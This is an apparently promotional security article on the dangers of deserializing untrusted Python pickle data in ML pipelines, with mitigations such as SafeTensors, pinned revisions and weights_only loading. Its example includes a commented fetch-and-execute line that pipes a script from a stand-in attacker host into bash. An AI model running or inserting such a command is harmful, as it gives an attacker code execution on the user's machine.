Python's pickle module is convenient. It can serialize almost any Python object. But that convenience comes with a critical security cost: deserializing untrusted pickle data is equivalent to arbitrary code execution.
Why Pickle Is Dangerous
When you call pickle.loads(data), Python executes the instructions embedded in the pickle stream. An attacker who controls the pickle data can execute arbitrary Python code on your machine. This isn't a theoretical risk — it's a well-documented, actively exploited vulnerability class.
# This looks innocent
model = pickle.loads(downloaded_data)
# But the attacker's pickle stream can do this:
# os.system("curl attacker.com/shell.sh | bash")
The ML Pipeline Problem
The AI/ML ecosystem has a particular problem with pickle. Model files (.pkl, .pt, .bin) are frequently:
- Downloaded from public registries without verification
- Loaded with
pickle.loads()ortorch.load()by default - Shared between teams via model registries and artifact stores
- Executed in production with elevated permissions
When we scanned major ML frameworks, we found pickle deserialization vectors in nearly every one:
- Unpinned
from_pretrained()calls that download and deserialize models from public registries - Direct
torch.load()usage withoutweights_only=True shelveanddillusage on untrusted data paths
Mitigation Strategies
Use SafeTensors. The safetensors format stores only tensor data, not arbitrary Python objects. It's a drop-in replacement for pickle-based model formats.
Pin model revisions. When downloading from model registries, always specify an exact commit hash. This prevents supply-chain attacks where a compromised model replaces the latest version.
Use weights_only=True. PyTorch 2.0+ supports torch.load(path, weights_only=True), which only loads tensor data and rejects arbitrary Python objects.
Validate before loading. Implement checksum verification and signature checking for any model file before deserialization.
The Broader Lesson
Pickle deserialization is just one example of a vulnerability class that traditional static analysis tools struggle with. Bandit will flag pickle.loads() — but it won't tell you that the data came from an untrusted network source three function calls earlier, or that your model loading pipeline downloads from an unpinned public registry.
Understanding the full data flow — from untrusted input to dangerous operation — is what separates surface-level scanning from deep code analysis.